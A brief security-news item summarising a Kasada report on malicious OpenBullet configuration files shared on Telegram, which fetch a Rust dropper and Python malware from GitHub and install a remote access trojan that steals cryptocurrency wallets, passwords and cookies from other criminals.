The Hacker News reports that advanced threat operations have been leveraging malicious configuration files of the open-source pen-testing tool OpenBullet to facilitate remote access trojan malware attacks against their less sophisticated peers.
Illicit OpenBullet configurations are being used to enable the retrieval of the Rust-based Ocean dropper from a GitHub repository, according to a Kasada report. The dropper's retrieval of the Python-based Patent malware from the same repository is then followed by the execution of a remote access trojan with screenshot capturing, task termination, cryptocurrency wallet information exfiltration, and Chromium browser-stored password and cookie theft capabilities. Cryptocurrency assets could also be stolen by the RAT.
"The distribution of the malicious OpenBullet configs within Telegram is a novel infection vector, likely targeting these criminal communities due to their frequent use of cryptocurrencies. ... This presents an opportunity for attackers to shape their collection to a specific target group and obtain other members' funds, accounts, or access. As the old saying goes, there is no honor amongst thieves," said the report.